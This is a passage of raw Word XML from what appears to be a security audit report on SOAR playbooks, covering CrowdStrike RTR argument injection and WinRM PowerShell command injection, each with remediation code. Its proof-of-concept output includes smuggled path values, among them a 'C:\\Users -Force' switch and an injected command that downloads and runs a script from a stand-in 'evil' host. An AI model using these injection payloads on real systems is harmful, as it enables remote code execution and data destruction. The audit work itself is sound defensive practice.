                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>stories/**</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>schemas/**</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>, docs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>760</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="994" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3639" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Inert content excluded from the shipped app.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>4. Detailed Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Findings are grouped by review area and ordered by severity within each area. Duplicate findings that two reviewers raised for the same root cause are consolidated under one identifier; the merged identifiers are noted at the end of this section.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 SOAR Response Playbooks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>This area produced 35 unique findings: 10 High, 8 Medium, 12 Low, 5 Informational.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB1-02 — CrowdStrike RTR command-argument injection and path traversal via raw path/pid inputs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: High (CVSS v3.1 base 8.5). Exploitability: Conditionally exploitable (PoC executed).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/CrowdStrike_OAuth_API_File_Eviction.py:307-324; playbooks/CrowdStrike_OAuth_API_File_Collection.py:281-298; playbooks/CrowdStrike_OAuth_API_Process_Termination.py:273-290; playbooks/CrowdStrike_OAuth_API_File_Restore.py:410-427</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t># File_Eviction.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>314  for playbook_input_path_item in playbook_input_path:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>318      parameters.append({"data": playbook_input_path_item[0], "command": "rm", ...})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>336  phantom.act("run admin command", parameters=parameters, name="run_admin_command_rm", ...)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The file path / PID is forwarded verbatim as the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> argument of a CrowdStrike RTR admin command (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>kill</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>cd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). RTR parses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as the command's argument line, so a value containing spaces and switches (e.g. a trailing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Force</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, an alternate path, wildcards) changes what the endpoint command does. No canonicalisation, no allow-list, no "file must exist / must be the flagged IOC" check. Combined with PB1-01 the operation fans out over the device x session cross-product. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>path</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are artifact CEF fields derived from the triggering detection. Source -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>collect2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; RTR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; endpoint. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - exact weaponisation depends on RTR's server-side argument handling for each command; at minimum an operator-supplied path is executed without validation (path traversal / unintended deletion). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>poc_fql_rtr.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, real output): with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>path = "C:\\Users -Force"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and two devices/two sessions returned by the injected query, the playbook emitted four </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>run admin command</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> calls:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>param: {"data": "C:\\Users -Force", "command": "rm", "device_id": "aid-0001", "session_id": "sess-A", ...}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>... (aid-0001/sess-B, aid-0002/sess-A, aid-0002/sess-B)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>-Force</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> switch rides along in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and the device x session nested loops (l.314-324) multiply the call. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>: validate the path against an absolute-path allow-list, reject argument-like tokens, and iterate device/session as pairs rather than a cross product:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import re, ntpath</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>def _safe_win_path(p):</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if not p or len(p) &gt; 260: return False</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if re.search(r'[&lt;&gt;"|?*\n\r]', p): return False          # illegal / injection chars</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if ' -' in p or p.strip().startswith('-'): return False  # switch injection</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return bool(re.match(r'^[A-Za-z]:\\', p)) and '..' not in p</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>for path_item, dev_item, sess_item in zip(playbook_input_path, query_device_result_data, create_session_result_data):</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if not _safe_win_path(path_item[0]): </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phantom.error(f"Rejected path {path_item[0]!r}"); continue</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parameters.append({"data": path_item[0], "command": "rm", "device_id": dev_item[0], "session_id": sess_item[0], ...})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-88 Improper Neutralization of Argument Delimiters in a Command (Argument Injection); CWE-77 Improper Neutralization of Special Elements used in a Command (Command Injection) (2024 CWE Top 25 #13); CWE-22 Improper Limitation of a Pathname to a Restricted Directory (Path Traversal) (2024 CWE Top 25 #5). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A03:2021 Injection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1070 Indicator Removal, T1059 Command and Scripting Interpreter. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation, CM-5 Access Restrictions for Change. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / Input Validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB2-03 — PowerShell command injection via unquoted filepath in internal_host_winrm_log4j_respond</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: High (CVSS v3.1 base 8.3). Exploitability: Exploitable (PoC executed).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/internal_host_winrm_log4j_respond.py:59,145-154</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:145-154</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>generate_deletion_commands</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Code excerpt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:59</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>script_str = f"$ProgressPreference = 'SilentlyContinue'; Test-Path {','.join(v)} | ConvertTo-Json"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:150</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>deletion_string += f"{filepath},"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Remove-Item {paths}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Unlike the SSH variant, the filepaths here are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>not quoted at all</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> before being joined with commas into a PowerShell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Test-Path</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Remove-Item</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command sent to the WinRM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>run script</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> action. Any </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, newline, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Invoke-Expression</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in a filepath executes arbitrary PowerShell on the Windows host with the WinRM asset's (documented Administrator) rights. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>playbook_input:filepath</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ← </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>log4j_respond.py:211-218</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ← </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>artifact:*.cef.filePath</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>locate_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> branch (no gate); deletion branch gated by the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>confirm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> prompt. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (real output):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>PoC 4: internal_host_winrm_log4j_respond.locate_files (line 59)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>script_str sent to WinRM 'run script':</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$ProgressPreference = 'SilentlyContinue'; Test-Path C:\a.jar; Invoke-WebRequest evil/p -OutFile p.ps1; ./p.ps1,C:\b | ConvertTo-Json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: build a PowerShell string-array literal with each path single-quoted and internal </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> doubled, and splat it:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>def ps_quote(s): return "'" + s.replace("'", "''") + "'"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
